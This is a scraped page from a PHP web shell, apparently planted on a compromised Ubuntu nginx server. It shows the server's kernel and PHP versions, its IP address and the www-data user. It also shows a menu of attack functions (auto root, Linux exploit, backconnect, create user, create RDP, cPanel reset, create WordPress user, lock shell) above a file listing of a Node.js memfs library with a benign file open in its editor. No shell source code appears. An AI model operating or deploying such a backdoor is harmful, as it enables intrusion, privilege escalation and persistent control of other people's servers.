Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
quiz1 /
node_modules /
memfs /
lib /
[ HOME SHELL ]
Name
Size
Permission
Action
internal
[ DIR ]
dr-xr-xr-x
Dirent.d.ts
535
B
-rw-rw-rw-
Dirent.js
1.83
KB
-rw-rw-rw-
Stats.d.ts
892
B
-rw-rw-rw-
Stats.js
2.83
KB
-rw-rw-rw-
constants.d.ts
1.3
KB
-rw-rw-rw-
constants.js
1.02
KB
-rw-rw-rw-
encoding.d.ts
350
B
-rw-rw-rw-
encoding.js
831
B
-rw-rw-rw-
getBigInt.js
191
B
-rw-rw-rw-
index.d.ts
854
B
-rw-rw-rw-
index.js
2.11
KB
-rw-rw-rw-
node.d.ts
4.39
KB
-rw-rw-rw-
node.js
16.72
KB
-rw-rw-rw-
process.d.ts
374
B
-rw-rw-rw-
process.js
1.18
KB
-rw-rw-rw-
promises.d.ts
4.23
KB
-rw-rw-rw-
promises.js
6.27
KB
-rw-rw-rw-
setImmediate.d.ts
143
B
-rw-rw-rw-
setImmediate.js
364
B
-rw-rw-rw-
setTimeoutUnref.d.ts
331
B
-rw-rw-rw-
setTimeoutUnref.js
493
B
-rw-rw-rw-
volume-localstorage.d.ts
471
B
-rw-rw-rw-
volume-localstorage.js
4.27
KB
-rw-rw-rw-
volume.d.ts
18.07
KB
-rw-rw-rw-
volume.js
90.23
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : setTimeoutUnref.js
"use strict"; Object.defineProperty(exports, "__esModule", { value: true }); /** * `setTimeoutUnref` is just like `setTimeout`, * only in Node's environment it will "unref" its macro task. */ function setTimeoutUnref(callback, time, args) { var ref = setTimeout.apply(typeof globalThis !== 'undefined' ? globalThis : global, arguments); if (ref && typeof ref === 'object' && typeof ref.unref === 'function') ref.unref(); return ref; } exports.default = setTimeoutUnref;
Close